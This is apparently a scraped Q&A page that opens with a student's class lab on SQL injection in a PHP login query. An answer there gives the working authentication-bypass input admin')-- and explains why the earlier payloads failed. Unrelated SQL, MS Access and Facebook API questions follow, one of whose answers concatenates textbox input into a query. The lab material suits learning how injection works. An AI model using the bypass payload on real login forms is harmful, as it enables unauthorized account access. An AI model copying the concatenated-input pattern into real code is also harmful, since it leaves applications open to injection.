We are working on a lab in class and I cannot seem to find what I am missing. The following code is an SQL Query for authenticating users:
$sel1 = mysql_query ("SELECT ID, name, locale, lastlogin, gender,
FROM USERS_TABLE
WHERE (name = ’$user’ OR email = ’$user’) AND pass = ’$pass’");
$chk = mysql_fetch_array($sel1);
if (found one record)
then {allow the user to login}
We are supposed to locate a the SQL-Injection vulnerability which I believe lies in:
WHERE (name = ’$user’ OR email = ’$user’) AND pass = ’$pass’");
To exploit it we are basically supposed to log in to an admin profile on a website with a pretty generic username and password form. The given information is that we know the profile name is admin. And we are supposed to exploit the username entry on the website only.
After reading the following article Security Idiots and a section out of a book Penetration Testing A Hands-On Introduction to Hacking by Georgia Weidman. These are some of the things I tried:
admin' OR 1--
admin'--
admin' AND 1=1--
And much more variations of this. My understanding is that I am selecting the admin profile completing that section with the "'" then forcing true and killing the rest of the code on that line. However, nothing I try seems to be working.
It is also important to note that for this lab we have special configured virtual machines that allow this attack to work.
So am I on the right track or am I not understanding the logic behind a SQL-Injection attack. I am not necessarily looking for what is the code I am looking for but I am worried I am heading off in the wrong direction and am missing something.
Any help is much appreciated. And I would be happy to elaborate on anything.
Thank you.
Thanks to Azi for pointing out the issue with space.
The SQL you where supposed to crack was
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = '$user' OR email = '$user') AND pass = '$pass'
Any of the admin' OR 1--, admin'--, admin' AND 1=1-- would not work because when user variable gets substituted with these inputs the statements become
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin' OR 1-- ' OR email = '$user') AND pass = '$pass'
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin'-- ' OR email = ’$user’) AND pass = ’$pass’
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin' AND 1=1-- ' OR email = ’$user’) AND pass = ’$pass’
All of which are syntax errors since opened bracket ( is not closed
When you give admin'-- (giving space at the end of your input is important) the input statement becomes
SELECT ID, name, locale, lastlogin, gender
FROM USERS_TABLE
WHERE (name = 'admin')-- ' OR email = ’$user’) AND pass = ’$pass’"
The SQL has no syntax error and will select the record with name as admin.
Related
Scenario
For most of its history, my company used subdomains in the email addresses, mostly by state, but others had division subdomains. A few examples of what we had include:
mo.widgits.com
sd.widgits.com
va.widgits.com
nhq.widgits.com
gis.widgits.com
tech.widgits.com
...and so on.
New Paradigm
A few years ago, top management decided that they wanted us all to be one happy family; as part of this cultural realignment, they changed everyone's email addresses to the single domain, in the format of firstname.lastname#widgits.com.
Present Challenges
In many of our corporate databases, we find a mixture of records using either the old format and the new format. For example, the same individual might have porky.pig#widgits.com in the employee system, and porky.pig#in.widgits.com in the training system. I have a need to match individuals up among the various systems regardless of which format email is used for them in that system.
Desired Matches
porky.pig#in.widgits.com = porky.pig#widgits.com -> true
mary.poppins#widgits.com = mary.poppins#nhq.widgits.com -> true
bob.baker#widgits.com = bob.barker#gis.widgits.com -> false
How to Accomplish This?
Is there a regex pattern that I can use to match email addresses regardless of which format they are? Or will I need to manually extract out the subdomain before attempting to match them?
Off the top of my head, you could strip off the subdomain from all email addresses before comparing them (that is, compare only the email name and domain). Something like this:
SELECT *
FROM emails
WHERE REGEXP_REPLACE(email1, '^(.*#).*?([^.]+\.[^.]+)$', '\1\2') =
REGEXP_REPLACE(email2, '^(.*#).*?([^.]+\.[^.]+)$', '\1\2');
Demo
Data:
WITH emails AS (
SELECT 'porky.pig#in.widgits.com' AS email1, 'porky.pig#widgits.com' AS email2 UNION ALL
SELECT 'mary.poppins#widgits.com', 'mary.poppins#nhq.widgits.com' UNION ALL
SELECT 'bob.baker#widgits.com','bob.barker#gis.widgits.com'
)
Here is an explanation of the regex pattern used:
^ start of the email
(.*#) match email name including # in \1
.*? consume content up, but not including
([^.]+\.[^.]+) final domain only (e.g. google.com)
$ end of the email
Then, we replace with \1\2 to effectively remove any subdomain components.
How about something like this?
SELECT
*
FROM
(
SELECT
table1.email,
table2.email,
SPLIT_PART(table1.email, '#', 1) AS table1_username,
SPLIT_PART(table2.email, '#', 1) AS table2_username,
SPLIT_PART(table1.email, '#', 2) AS table1_domain,
SPLIT_PART(table2.email, '#', 2) AS table2_domain
FROM
table1 CROSS
JOIN table2
) S
WHERE
(
table1_username = table2_username
AND (
table1_domain like '%.' || table2_domain
OR table2_domain like '%.' || table1_domain
)
);
Can anyone please explain why this is failing?
testDB=# Update users set email = ‘Alex+check#test.com’ where id = 106;
ERROR: syntax error at or near "check"
LINE 1: Update users set email = ‘Alex+check#test.com’ where id = 1...
This might be a long shot but check your apostrophes. They look wrong.
Does this work if you cut/paste it?
Update users set email = 'Alex+check#test.com' where id = 106;
Your apostrophes: ‘foo‘
My apostrophes: 'foo'
It's subtle but I think you have some kind of unicode character instead of a simple '.
Another question that stumps me.
I have a continuous form that shows a list of all of our clients at the law firm I work at here. Right now you can double click on a client name where a form (frmContactSummary) then opens up to display all the information for that client.
Problem is, as it is currently designed only one form can be open for a client at a time.
We want to be able to open multiple versions or instances of frmContactSummary.
I borrowed code from Allen Browne's site, which is as follows:
Option Compare Database
Option Explicit
'Author: Allen J Browne, July 2004
'Email: allen#allenbrowne.com
'Found at: http://allenbrowne.com/ser-35.html
Public clnClient As New Collection 'Instances of frmClient.
Function OpenAClient() 'ContactID As Integer
'Purpose: Open an independent instance of form frmClient.
Dim frm As Form
'Debug.Print "ID: " & ID
'Open a new instance, show it, and set a caption.
Set frm = New Form_frmContactSummary
frm.Visible = True
frm.Caption = frm.Hwnd & ", opened " & Now()
'Append it to our collection.
clnClient.Add Item:=frm, Key:=CStr(frm.Hwnd)
Set frm = Nothing
End Function
This works in a way, but it only opens up the first record in our Contact table. We want the instance to open on a specific record, or ID from the Contacts table.
I tried this code near the end:
frm.RecordSource = "select * from Contacts where [ID] = " & ContactID
But it did not work.. :-(
Any advise would be much appreciated! Thank you!
Ok, when you create a instance of a form, you can’t use the common approach of a where clause like this:
Docmd.OpenForm "frmContactSummary",,,"id = " & me!id
The above of course would work for opening one form.
However, in your case, you need:
Create a new instance of the form
Move/set the form recordsource to ID
Display the form
So we need a means to move or set the form to the ID of the row we just clicked on.
So right after we create the form, then add this line of code:
Set frm = New Form_frmContactSummary
Frm.RecordSource = "select * from Contacts where id = " & me!id
And rest of your code follows.
It not clear if the PK (key) of the table Contacts is “id”, or “ContactID”
So your code will be:
Frm.RecordSource = "select * from Contacts where id = " & me!id
Or
Frm.RecordSource = "select * from Contacts where Contactid = " & me!ContactID
Simply replace “ContactID” in above with a actual PK id used in table contacts. The "Id" has nothing to do with the collection. We are simply building a SQL statement that will pull/set the form to the one row. So the only information required here is what is the PK name in your continues form, and what is the PK name in your frmContactsSummary. (they will be the same name in both forms, and should thus be the same in the sql statement.
I looking at splitting the name supplied by the Facebook API across two lines and I want this to display correctly depending of the country of origin of the person. So the western standard of
Given Name
Family Name
Where applicable, and
Family Name
Given Name
in countries where the names should be reversed
Facebook supply a number of name fields
name - The person's full name
name_format - The person's name formatted to correctly handle Chinese, Japanese, Korean ordering.
first_name - The person's first name
last_name - The person's last name.
I assume name is always [Given Name] [Family Name] (may also include middle name?)
name_format sounds like it'll be the name in the correct display order
I'm not sure if first_name and last_name is the indicator of display order, or is first_name = [given name] and last_name = [family name] as would be assumed in the US?
The real question is how can I split the Facebook display name into given name and family name and then ensure I'm displaying them in the correct order.
Just tried getting name_format back on a user with Chinese/Korean ordering (used typical English name for ease of reading):
Using https://developers.facebook.com/tools/explorer get a token (clicking Get Token button) and requesting the following fields:
me?fields=first_name, last_name, name, name_format
Returns
"first_name" = "John"
"last_name" = "Smith"
"name" = "Smith John"
"name_format" = "{first} {last}"
In this case you'd expect it to return "{last} {first}"
so looks like name_format is completely useless. I've tested it on two users, one with western name order and one like the above, both returned the same name_format value.
After some more research, it turns out the name_format does not return what the API documentation says, which is:
The person's name formatted to correctly handle Chinese, Japanese,
Korean ordering.
As detailed in the API, but something more akin to what the name would suggest, which is the formatting for the name. In my instance, the return from the API call is as follows.
"name": "Will Calderwood",
"name_format": "{first} {last}"
I think it's safe to assume that for a Korean locale it would be
"name": "Calderwood Will",
"name_format": "{last} {first}"
So the name_format can be used to break up the name and display it in the correct order.
The field first_name is the given name, the last_name is what you call "family name". To me it's not really clear where your problem is here to be honest.
I am willing to create a form which upon it's opening, it should prompt the user to enter the record ID it should open on.
the form needs to open the record ID specified upon its launch, not an assigned ID previously, I think it should do the prompting like something the [] do in queries.
any help would be appreciated
thanks in advance
This is pretty straight forward. You can do this either of 2 ways:
Create a form with a Textbox (or Combobox) where the user will enter an ID or select it from a list. Then create a button called something like btnSubmit. Behind the button, in code, you would enter something like:
sqlRecordSource = "SELECT * FROM MyTable WHERE RecordID = " & Me.MyTextboxName & ""
DoCmd.RunSQL sqlRecordSource
The other option you could have is that you create a query, call it qryRecordID, and the SQL would look like this:
SELECT * FROM MyTable WHERE RecordID = [Enter a RecordID]
You could then run that query anywhere and not need a separate form with a RecordID textbox, because the query will automatically prompt you for one.